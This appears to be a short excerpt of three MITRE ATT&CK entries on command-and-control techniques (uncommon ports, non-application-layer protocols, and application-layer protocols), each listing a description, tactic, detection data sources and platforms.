Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre